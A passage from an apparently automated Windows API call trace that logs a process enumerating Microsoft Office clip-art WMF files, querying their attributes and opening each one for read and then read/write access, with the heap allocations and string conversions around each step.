returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.404] AreFileApisANSI () returned 1 [0102.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 69 [0102.404] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd20013_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b32)) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0102.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.404] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30e8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00008_.WMF", cAlternateFileName="")) returned 1 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0102.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0102.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.405] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.406] AreFileApisANSI () returned 1 [0102.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0102.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.406] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.406] AreFileApisANSI () returned 1 [0102.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 69 [0102.406] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.407] GetFileType (hFile=0x368) returned 0x1 [0102.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.407] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.407] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.407] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.408] CloseHandle (hObject=0x368) returned 1 [0102.408] AreFileApisANSI () returned 1 [0102.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 69 [0102.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.408] GetFileType (hFile=0x368) returned 0x1 [0102.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.408] CloseHandle (hObject=0x368) returned 1 [0102.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.410] AreFileApisANSI () returned 1 [0102.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a238 [0102.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 69 [0102.410] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30e8)) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0102.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.410] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.411] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd4897d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd4897d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x265a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00012_.WMF", cAlternateFileName="")) returned 1 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.411] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0102.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.411] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.411] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0102.412] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.412] AreFileApisANSI () returned 1 [0102.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.412] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.412] AreFileApisANSI () returned 1 [0102.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.412] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0102.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 69 [0102.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.413] GetFileType (hFile=0x368) returned 0x1 [0102.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.413] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.413] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.413] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.413] CloseHandle (hObject=0x368) returned 1 [0102.414] AreFileApisANSI () returned 1 [0102.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 69 [0102.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.414] GetFileType (hFile=0x368) returned 0x1 [0102.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.414] CloseHandle (hObject=0x368) returned 1 [0102.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.414] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.415] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.415] 